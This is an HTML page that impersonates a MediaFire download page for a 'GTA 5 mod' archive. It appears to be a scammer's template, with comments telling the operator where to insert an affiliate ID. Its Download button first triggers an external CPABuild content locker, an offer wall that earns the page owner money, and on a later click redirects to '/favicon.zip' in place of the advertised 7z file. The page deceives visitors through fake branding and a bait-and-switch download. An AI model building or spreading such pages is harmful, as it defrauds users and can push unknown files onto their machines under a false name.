<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
	<link rel="icon" href="favicon.ico" type="image/gif" sizes="16x16">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>gta 5 mod by Tricks Mentor</title>
    <meta name="keywords" content="online storage, free storage, cloud Storage, collaboration, backup file Sharing, share Files, photo backup, photo sharing, ftp replacement, cross platform, remote access, mobile access, send large files, recover files, file versioning, undelete, Windows, PC, Mac, OS X, Linux, iPhone, iPad, Android">
    <meta name="description" content="MediaFire is a simple to use free service that lets you put all your photos, documents, music, and video in a single place so you can access them anywhere and share them everywhere.">
        <meta itemprop="name" content="gta 5 mod by Tricks Mentor">
        <meta itemprop="image" content="images/file.jpg">
        <meta itemprop="description" content="">
		<link rel="stylesheet" type="text/css" href="css/main.css">
		<!-- [Mosawi9] Here to change you cpabuild header -->
	<script type="text/javascript">
    var CPABUILDSETTINGS={"it":469706,"key":"eeb95"};
</script>
<script src="https://cpabuild.com/public/external/locker.js"></script>

		<!-- Here to change you cpabuild header -->

</head>
<body class="en defaultTheme">
        
<div class="mf-dlr page ads-normal">
    <div class="content">
        <style type="text/css">
    .header {
        position: absolute;
        width: 230px;
        height: 80px;
        margin: 12px 0 0 0;
        font-size: 0;
        background: #fff !important;
    }

    .dl-box {
        position: relative;
    }

    .header > .logo > a {
        display: table;
        height: 35px;
        width: 190px;
        background: url(http://static.mediafire.com/images/backgrounds/header/mf_logo_full_color.svg) 0 0/180px auto no-repeat;
        margin: 0 auto;
        text-indent: -9999px;
        opacity: 1;
    }

    .header > .actions {
        display: table;
        margin: 3px auto 0 auto;
    }

    .header > .actions > li {
        position: relative;
        display: inline-block;
        height: 30px;
        width: 85px;
        background-color: #e8e9ec;
        padding: 0;
        border-radius: 3px;
        margin-right: 0;
        text-align: center;
        text-shadow: none;
        text-transform: uppercase;
    }

    .header > .actions >li > a:hover {
        color: #444 !important;
    }

    .header > .actions > li:first-child {
        margin-right: 1px;
        border-top-right-radius: 0;
        border-bottom-right-radius: 0;
    }

    .header > .actions > li:last-child {
        border-top-left-radius: 0;
        border-bottom-left-radius: 0;
    }

    .header > .actions > li > a {
        font-size: 11px;
        line-height: 30px;
        color: #777;
        position: absolute;
        left: 0;
        width: 100%;
        overflow: hidden;
        text-overflow: ellipsis;
        white-space: nowrap;
    }
</style>
<div class="header">
    <div class="logo">
        <a href="https://www.mediafire.com/">MediaFire</a>
    </div>
</div>                    
<div class="center">
    <div class="ads dl-box">
                    
<div class="dl-btn-cont">
    <div class="icon 7z archive application_x-7z-compressed"></div>
    <div class="dl-btn-labelWrap">
                    <div class="promoDownloadName notranslate">
                <div class="dl-btn-label"
                    title="gta 5 mod by Tricks Mentor.7z">
                    gta 5 mod by Tricks Mentor                </div>
            </div>
                <div class="dl-utility-nav">
            <ul>
                <li>
                    <a href="#"
                        rel="noopener"
                        id="shareButton"
                        class="nopop g-Icon g-Icon--white g-Icon--share"
                        aria-labelledby="share-tooltip"></a>
                    <span id="share-tooltip" class="alt point-down tooltip">
                        More sharing options
                    </span>
                </li>
                <li>
                    <a href="#"
                        rel="noopener"
                        class="nopop g-Icon g-Icon--white g-Icon--link"
                        aria-labelledby="copy-tooltip"></a>
                    <span id="copy-tooltip" class="alt point-down tooltip">
                        Copy file link to clipboard
                    </span>
                </li>
                <li>
                    <a href="#"
                        class="g-Icon g-Icon--white g-Icon--add"
                        aria-labelledby="share-tooltip"></a>
                    <span id="save-tooltip" class="alt point-down tooltip">
                        Save file to My Files
                    </span>
                </li>
            </ul>
        </div>
    </div>
    <button onclick="myfunction()" id="bb1"style="position: absolute;right: 30px;box-shadow: 0 8px 16px 0 rgba(0,0,0,0.2), 0 6px 20px 0 rgba(0,0,0,0.19);background-color: #4CAF50; border: none; color: white;padding: 15px 32px;text-align: center;text-decoration: none;display: inline-block;font-size: 16px;margin: 4px 2px;cursor: pointer;">Download</button>
    </div>
            <div class="dl-info">
                <div class="intro icon 7z archive application_x-7z-compressed">
                    <div class="filename">gta 5 mod by Tricks Mentor.7z</div>
                    <div class="filetype"><span>Compressed Archive</span><span> (.7Z)<span></span></span></div>
                </div>
                <ul class="details">
                    <li>File size: <span>88.96MB</span></li>
                    <li>Uploaded: <span>2017-08-25 01:24:55</span></li>
                </ul>
                <div class="description">
                    <h6>About Compressed Archive Formats</h6>
                    <p>Compressed archives combine multiple files into a single file to make them easier to transport or save on diskspace.  Archiving software may also provide options for encryption, file spanning, checksums, self-extraction, and self-installation. Zip is the most-widely used format, used by the Windows operating system and more recently by OSX as well. RAR is also a very popular and flexible format. Unix uses the tar file format, while Linux uses the tar and gz format.</p>
                </div>
                <div class="sidebar">
                                        <div class="apps">
                        <div>
                            <div class="filename" id="demo">gta 5 mod by Tricks Mentor.7z</div>
                            <br>Can be opened with
                        </div>
                        <ul>
                                                        <li>
                                <a class="nopop" href="https://store.winzip.com/852/purl-mediafire" target="_blank" rel="noreferrer" title="WinZip for PC">
                                    WinZip for PC                                </a>
                            </li>
                                                    </ul>
                    </div>
                                        <div class="Download-compatibility">
                        <div>
                            <div class="filename">gta 5 mod by Tricks Mentor.7z</div>
                            <br>System compatibility
                        </div>
                        <select class="g-Select" id="compat-select">
                            <option value="windows"
                                 selected                                 data-compat                            >
                                Windows (your OS)                            </option>
                            <option value="osx"
                                                                 data-compat                            >
                                macOS                            </option>
                            <option value="linux"
                                                                 data-compat                            >
                                Linux                            </option>
                        </select>
                        <div class="Download-compatibilityStatus is-compatible" id="compat-supported">
                            <span></span>
                            <p>File is compatible with the selected operating system.</p>
                        </div>
                        <div class="Download-compatibilityStatus is-notCompatible" id="compat-unsupported" style="display:none">
                            <span></span>
                            <p>File is not compatible with the selected operating system.</p>
                        </div>
                        <script type="text/javascript">
                            var compatSelect = document.getElementById('compat-select');
                            var compat = document.getElementById('compat-supported');
                            var nonCompat = document.getElementById('compat-unsupported');
                            compatSelect.onchange = function(e) {
                                var options = e.target.options;
                                var selection = options[options.selectedIndex];
                                var supported = selection && selection.attributes['data-compat'];
                                compat.style.display = supported ? 'block' : 'none';
                                nonCompat.style.display = !supported ? 'block' : 'none';
                            };
                            
                        </script>
                    </div>
                </div>
            </div>
                        </div>
</div>

<script>
var clicks = 0;
function myfunction() {
    if (clicks == 0){
    	// [Mosawi9] Here you can change your onlick depend on your cpa network (if you use cpabuild don't change anything!)
        CPABuildLock();
    } 
// [Mosawi9] Here you can change the link of download
    else{
        window.location.href = '/favicon.zip';

        // Here you can change the link of download

    }
    ++clicks;
}
</script>
</body>
</html>
